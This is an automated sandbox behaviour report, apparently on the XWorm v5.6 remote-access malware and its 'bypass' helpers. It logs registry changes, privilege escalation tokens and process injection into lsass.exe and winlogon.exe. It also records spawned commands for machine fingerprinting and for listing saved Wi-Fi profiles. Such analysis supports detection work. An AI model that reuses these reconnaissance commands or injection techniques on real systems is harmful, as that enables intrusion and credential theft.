Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe N/A
N/A N/A C:\ProgramData\Xworm_Bypass.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A
N/A N/A C:\Windows\system32\dialer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3564 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 3564 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe
PID 3564 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 3564 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe
PID 3564 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 3564 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1452 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 1452 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe
PID 4176 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 3440 wrote to memory of 4336 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 3440 wrote to memory of 4336 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4176 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 4760 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4760 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4760 wrote to memory of 2072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4176 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 3252 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3252 wrote to memory of 448 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4176 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\System32\Wbem\wmic.exe
PID 4176 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\System32\Wbem\wmic.exe
PID 4176 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4924 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4924 wrote to memory of 3480 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4176 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 2720 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2720 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4176 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 2680 wrote to memory of 4308 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\wbem\WMIC.exe
PID 4176 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 4176 wrote to memory of 3980 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe C:\Windows\system32\cmd.exe
PID 3980 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 3980 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2216 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2216 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2228 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe C:\Windows\system32\dialer.exe
PID 2868 wrote to memory of 608 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\winlogon.exe
PID 2868 wrote to memory of 660 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\lsass.exe
PID 2868 wrote to memory of 948 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 316 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\dwm.exe
PID 2868 wrote to memory of 424 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 508 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2868 wrote to memory of 1136 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2868 wrote to memory of 1144 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1152 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2868 wrote to memory of 1160 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1236 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1256 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1304 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1408 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1436 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe
PID 2868 wrote to memory of 1604 N/A C:\Windows\system32\dialer.exe C:\Windows\System32\svchost.exe
PID 2868 wrote to memory of 1612 N/A C:\Windows\system32\dialer.exe C:\Windows\system32\svchost.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWormV5.6.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Xworm V5.6.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\XWorm_Bypass.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm v5.6\Bypass_helper.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

